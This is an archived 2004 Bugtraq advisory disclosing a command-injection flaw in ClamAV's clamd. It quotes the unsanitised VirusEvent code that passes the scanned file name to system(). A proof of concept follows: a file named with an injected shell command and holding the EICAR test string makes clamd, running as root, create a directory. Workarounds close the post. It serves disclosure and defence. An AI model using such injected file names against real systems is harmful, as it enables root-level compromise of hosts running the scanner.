[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: clamd - NEVER use "%f" in your "VirusEvent"
From: Rene <l0om () excluded ! org>
Date: 2004-03-30 12:34:18
Message-ID: 20040330123418.12944.qmail () search ! securityfocus ! com
[Download RAW message or body]
date: 30 March 2004
product: clam antivirus
author: l0om - l0om[at]excluded.org - www.excluded.org
#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot of \
features and its easy to handle. for normal you start it from the command line on \
demand but if you use the the dazuko module you can also scan in realtime. the \
program runs on standard as root but you can drop its privileges if you want to.
in the clamav.conf we can find the "VirusEvent" direction (which is on default \
disabled):
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
# eg. by using some special file name when %f is used.
# Always use a full path to the command.
# Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"
"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
this is not enough. they should del this "%f" feature for security reasons because in \
my opinion, for now, you nearly cant prevent the "%f" thing from breaking out of your \
VirusEvent and do whatever the attacker likes too.
#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct \
*copt) {
[...]
buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, \
sizeof(char));
if((pt = strstr(cmd, "%f"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd); <----
strcat(buffer, filename); <----
if((pt = strstr(cmd, "%f"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd); <----
strcat(buffer, filename); <----
strcat(buffer, pt); <----
free(cmd);
cmd = strdup(buffer);
}
if((pt = strstr(cmd, "%v"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd);
strcat(buffer, virname);
strcat(buffer, pt);
free(cmd);
cmd = strdup(buffer);
}
free(buffer);
/* WARNING: this is uninterruptable ! */
system(cmd); <------------------------------------------
free(cmd);
}
#####################################################################
as we can see in the source code there is no filter for shell characters like ";" or \
" in the program. therefor an attacker may take a look at your VirusEvent(as your \
clamav.conf is world-readable) and create a file named " ; chmod 777 etc" for \
example and put some virus in it. as we can see above the clamd will execute the \
buffer. The attacker cant use pathes like "/" but he has what it takes to get root or \
kill the system.
the commands will be executed by the clamd on "/" as the process makes a chdir("/").
#####################################################################
example:
l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r-- 1 root root 6863 2004-03-27 11:27 \
/usr/local/etc/clamav.conf
l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
# eg. by using some special file name when %f is used.
# Always use a full path to the command.
# Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" \
admin@network.net
# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]
l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
l0om:~> ls
"; mkdir owned; echo " XXX.blow_balls_4_real.mpeg \
XxX.admin_and_amanda_backup_deamon_having_fun.avi
# on realtime scanning the file will be scaned when we close it or we open it for \
reading. # [...whatever- on next virus scan]
l0om:~> ls -ld /owned
drwxrwxrwx 2 root root 48 2004-03-30 11:29 owned
#####################################################################
workaround:
- dont use the VirusEvent
- dont use the "%f" in the VirusEvent(!)
- start events with your own script parsing the clamd´s log file manual
######################################################################
have phun everybody!
someone on NoFX concert or on the deconstruction-tour in köln? PARTY ON!
-- l0om
-- www.excluded.org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic